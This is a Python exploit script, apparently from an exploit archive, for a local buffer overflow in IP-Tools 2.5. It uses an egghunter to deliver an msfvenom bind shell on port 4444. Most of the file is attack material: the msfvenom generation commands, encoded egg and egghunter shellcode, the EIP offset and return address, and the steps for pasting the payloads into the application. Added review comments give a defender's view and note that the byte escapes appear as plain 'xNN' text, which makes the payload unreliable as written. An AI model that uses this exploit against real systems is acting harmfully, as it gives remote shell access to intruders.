#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characters: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#


##################EGG Shellcode Generation#################################

#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier

# Stage 1 payload ("egg"): an 8-byte tag followed by the msfvenom-encoded
# bind shell from the generation command above (x86/alpha_mixed encoding, so
# the bytes stay inside the "good characters" set listed in the header).
# The leading tag "w00tw00t" is what the egghunter stage further down scans
# memory for (see the comment above the egghunter string).
# NOTE(review): in this listing the escapes appear as bare "xNN" text rather
# than "\xNN" byte escapes -- presumably lost in transcription; as written
# these literals are plain ASCII text, not the 710 bytes the comment cites.
# Defender's view: per the header steps this stage is pasted into the SNMP
# scanner "From Addr" field. The "w00tw00t" tag followed by a long
# alphanumeric run in that field, or an unexpected TCP 4444 listener spawned
# by ip_tools.exe, is the observable artefact of this technique.
egg = "w00tw00t"
egg += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
egg += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
egg += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
egg += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
egg += "x69x6cx4bx58x6dx52x35x50x35x50x75x50x63"
egg += "x50x4fx79x4dx35x36x51x4bx70x71x74x6ex6b"
egg += "x36x30x46x50x6ex6bx66x32x44x4cx6cx4bx63"
egg += "x62x54x54x4cx4bx72x52x65x78x34x4fx68x37"
egg += "x52x6ax34x66x50x31x59x6fx4cx6cx57x4cx53"
egg += "x51x71x6cx67x72x54x6cx31x30x5ax61x58x4f"
egg += "x34x4dx56x61x4fx37x68x62x4ax52x36x32x66"
egg += "x37x4ex6bx36x32x42x30x6cx4bx50x4ax35x6c"
egg += "x4cx4bx72x6cx44x51x44x38x78x63x32x68x55"
egg += "x51x78x51x43x61x6ex6bx76x39x45x70x75x51"
egg += "x59x43x6ex6bx33x79x42x38x4dx33x65x6ax71"
egg += "x59x6ex6bx36x54x4ex6bx36x61x78x56x46x51"
egg += "x49x6fx4ex4cx79x51x7ax6fx66x6dx35x51x48"
egg += "x47x36x58x79x70x30x75x39x66x33x33x33x4d"
egg += "x58x78x57x4bx73x4dx56x44x53x45x48x64x61"
egg += "x48x4ex6bx72x78x67x54x57x71x69x43x73x56"
egg += "x6ex6bx54x4cx50x4bx6cx4bx53x68x37x6cx73"
egg += "x31x58x53x4cx4bx74x44x4ex6bx67x71x48x50"
egg += "x4fx79x70x44x36x44x76x44x51x4bx71x4bx55"
egg += "x31x46x39x32x7ax63x61x4bx4fx6bx50x53x6f"
egg += "x61x4fx61x4ax4cx4bx62x32x6ax4bx6ex6dx31"
egg += "x4dx63x58x75x63x54x72x35x50x45x50x33x58"
egg += "x52x57x33x43x36x52x73x6fx62x74x33x58x30"
egg += "x4cx31x67x54x66x63x37x69x6fx6ex35x78x38"
egg += "x4ex70x63x31x37x70x43x30x35x79x4fx34x32"
egg += "x74x46x30x51x78x36x49x4fx70x52x4bx63x30"
egg += "x59x6fx38x55x73x5ax43x38x70x59x36x30x49"
egg += "x72x59x6dx57x30x52x70x47x30x50x50x51x78"
egg += "x5ax4ax44x4fx6bx6fx79x70x39x6fx39x45x4f"
egg += "x67x65x38x44x42x77x70x64x51x71x4cx6cx49"
egg += "x6dx36x32x4ax72x30x63x66x56x37x30x68x68"
egg += "x42x4bx6bx64x77x61x77x59x6fx39x45x70x57"
egg += "x35x38x6dx67x68x69x65x68x59x6fx6bx4fx4a"
egg += "x75x36x37x75x38x34x34x58x6cx57x4bx4dx31"
egg += "x49x6fx4ax75x51x47x4ex77x55x38x32x55x52"
egg += "x4ex70x4dx43x51x39x6fx6ex35x51x78x70x63"
egg += "x32x4dx33x54x77x70x6ex69x68x63x30x57x63"
egg += "x67x30x57x55x61x6bx46x71x7ax56x72x31x49"
egg += "x62x76x6dx32x79x6dx55x36x6ax67x62x64x51"
egg += "x34x67x4cx73x31x33x31x6ex6dx71x54x44x64"
egg += "x66x70x39x56x43x30x77x34x43x64x76x30x72"
egg += "x76x61x46x50x56x32x66x30x56x62x6ex72x76"
egg += "x53x66x61x43x52x76x62x48x44x39x78x4cx45"
egg += "x6fx4fx76x69x6fx68x55x6bx39x39x70x42x6e"
egg += "x66x36x50x46x69x6fx36x50x75x38x33x38x4b"
egg += "x37x67x6dx73x50x69x6fx6ax75x6dx6bx58x70"
egg += "x4dx65x79x32x76x36x75x38x4ex46x6fx65x6d"
egg += "x6dx6fx6dx69x6fx79x45x35x6cx73x36x31x6c"
egg += "x44x4ax6bx30x79x6bx4dx30x73x45x74x45x6f"
egg += "x4bx30x47x32x33x31x62x72x4fx52x4ax37x70"
egg += "x72x73x49x6fx7ax75x41x41"

# Write stage 1 to egg.txt in the working directory (the file the header
# steps say to paste from). Same open/write/close sequence as before; the
# context manager just guarantees the handle is closed on exit.
with open("egg.txt", "w") as f:
    f.write(egg)

##################EGG Hunter Shellcode Generation#################################

#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode preceded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "x33xd2x31xdbx53x53x53x53xb3xc0x66x81xcaxffx0fx42x52x6ax26x58x33xc9x8bxd4x64xffx13x5ex5ax3cx05x74xe9xb8x77x30x30x74x8bxfaxafx75xe4xafx75xe1xffxe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes

# Stage 2 ("egghunter"): the memory-scanning stub from the command above
# (mona-generated wow64 hunter, re-encoded as x86/alpha_mixed) that looks
# for the "w00tw00t" tag and hands execution to the egg once found.
# Per the header this string goes into the HostMonitor "Log to file"
# setting -- the field whose overflow overwrites EIP at offset 264.
# NOTE(review): same transcription caveat as for `egg`: the escapes appear
# as bare "xNN" text in this listing, so the comment's 150-byte size does
# not match what these literals actually hold as written.
egghunter = ""
egghunter += "x57x59x49x49x49x49x49x49x49x49x49x49"
egghunter += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
egghunter += "x50x30x41x30x41x6bx41x41x51x32x41x42"
egghunter += "x32x42x42x30x42x42x41x42x58x50x38x41"
egghunter += "x42x75x4ax49x35x63x4bx62x30x31x4bx6b"
egghunter += "x52x73x56x33x46x33x46x33x58x33x49x50"
egghunter += "x45x36x6fx71x6ax6ax6bx4fx46x6fx31x52"
egghunter += "x66x32x72x4ax55x76x32x78x70x33x38x49"
egghunter += "x6ex6bx5ax74x55x34x79x6fx37x63x53x6e"
egghunter += "x62x7ax55x6cx66x65x51x64x4dx39x48x38"
egghunter += "x30x77x50x30x70x30x74x34x4ex6bx58x7a"
egghunter += "x6cx6fx51x65x4ax44x4ex4fx42x55x79x71"
egghunter += "x69x6fx6ax47x41x41"

#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]

# Value that lands in EIP: the four bytes of 0x00473259 (the pivot gadget
# noted in the comment above, located inside IP_TOOLS.EXE itself) written in
# reverse, i.e. little-endian, order.
# Defender's view: the gadget comes from the application's own image, which
# the header lists under "Non-Participating Modules" (presumably meaning it
# is not randomised -- TODO confirm), so the address is stable between runs.
# Building ip_tools.exe with ASLR/DEP support is what would invalidate this
# fixed address.
eip = "x59x32x47x00"

# Overflow string for the "Log to file" field: hunter stub, filler up to the
# 264-byte EIP offset stated in the header, then the return address. The
# filler length is derived from len(egghunter), so the data before `eip` is
# always 264 characters long regardless of the stub's size.
# NOTE(review): `buffer` shadows a Python 2 builtin; harmless here but easy
# to confuse with the builtin when reading.
buffer = egghunter + "x41" * (264 - len(egghunter)) + eip

# Write the overflow string to egghunter.txt in the working directory (the
# second file the header steps reference). Behaviour matches the explicit
# open/write/close; the context manager only guarantees the close.
with open("egghunter.txt", "w") as f:
    f.write(buffer)